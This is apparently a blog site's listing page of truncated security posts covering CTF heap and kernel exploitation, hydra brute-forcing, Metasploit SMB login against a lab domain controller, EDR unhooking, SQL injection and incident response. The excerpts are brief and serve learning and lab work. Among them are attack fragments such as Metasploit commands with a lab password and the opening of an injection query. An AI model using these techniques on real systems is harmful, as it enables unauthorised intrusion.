Two ways of heap overflow (topic)

babyheap_0ctf_2017 The first step is to change libc     Routine checksec   Enter code audit   If you find that the symbol table is closed, you need to guess the function with the function.   Then rename the main function. Allocate function:     Nothing special Fill function   It is obvious that there i ...

Posted by jonex on Fri, 20 May 2022 05:29:05 +0300

Hacker's road - use hydra for simple password blasting

Tools needed: Kali (or not required) hydra (Kali comes with it, you can install windows version or other platforms by yourself) Password dictionary (go to github and find the keyword "dictionary") This tutorial is only for technical exchange. Please do not use it for other purposes. I am not responsible for any illegal and crim ...

Posted by donbonzo on Thu, 12 May 2022 19:44:06 +0300

Taking down the domain controller of ATT&CK series I of Intranet horizontal penetration

information gathering Information collection domain controller related information: Through arp scanning, it is found that the ip address of the domain controller is 192.168.52.138. Try to use the smb of msf_ Whether the login module successfully logs into smb 1 search smb_login 2 use 0 3 set rhosts 192.168.52.138 4 set smbpass hongrisec@2022 ...

Posted by jingcleovil on Thu, 12 May 2022 13:05:02 +0300

General unhook method of custom jump function (update)

0x00 Preface This paper introduces an interesting unhook technique, which comes from a GitHub POC sent by a small partner: https://github.com/trickster0/LdrLoadDll-Unhooking , this article will interpret this method step by step with reference to this POC. At present, most of the classic methods are direct system call (Syscall) or finding the ...

Posted by sidney on Fri, 06 May 2022 14:15:45 +0300

Linux intrusion troubleshooting for emergency response

preface In case of hacker intrusion, system crash or other security events affecting the normal operation of business, it is urgent to deal with them at the first time, so that the enterprise's network information system can resume normal operation in the shortest time, further find the source of intrusion, restore the process of intrusion acc ...

Posted by feddie1984 on Fri, 06 May 2022 01:45:36 +0300

linux kernal pwn WCTF 2018 klist

startup script #!/bin/sh qemu-system-x86_64 -enable-kvm -cpu kvm64,+smep -kernel ./bzImage -append "console=ttyS0 root=/dev/ram rw oops=panic panic=1 quiet kaslr" -initrd ./rootfs.cpio -nographic -m 2G -smp cores=2,threads=2,sockets=1 -monitor /dev/null -nographic open smep open kaslr see all possible threads Then consider the conditional c ...

Posted by mu-ziq on Fri, 29 Apr 2022 01:15:21 +0300

linux kernal pwn WCTF 2018 klist

a little recap we are trying to exploit a uaf Then use a pipe structure to convert uaf to read and write at any address. Finally, by searching for the cred structure and modifying the cred structure to escalate the rights Learn from the big guy exp The first is ha1vk boss #define PIPE_BUFFER_SIZE 0x280 #define BUF_SIZE PIPE_BUFFER_SIZE char ...

Posted by tim on Thu, 28 Apr 2022 17:59:46 +0300

Introduction to Python stunt python3 to realize password cracking

preface For me, the uniqueness of Wushu lies in its simplicity. The simple method is also the right method. At the same time, Wushu is nothing special. The closer to the true meaning of Wushu, the less waste in the performance of moves brief introduction The first chapter of python stunts is the introduction syntax of python. The two programs t ...

Posted by unerd.co.uk on Mon, 25 Apr 2022 00:33:44 +0300

Record a packet de signing practice

*Solemnly declare: the system is an authorized test. The information provided in this article should not be used for illegal purposes. Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article shall be borne by the user himself, and the author of this article will not bear any ...

Posted by johnnyblaze1980 on Fri, 22 Apr 2022 15:48:09 +0300

Network Security Learning Day8

The day before yesterday, I wrote the simple sql injection process of mozhe and summarized the relevant code; Attach a summary diagram of MYSQL injection: First, when we get the website, we use the order by statement to judge the number of fields, and then use the union joint query to find the echo point through the error display: id=-1 u ...

Posted by az_wraith on Fri, 22 Apr 2022 11:17:39 +0300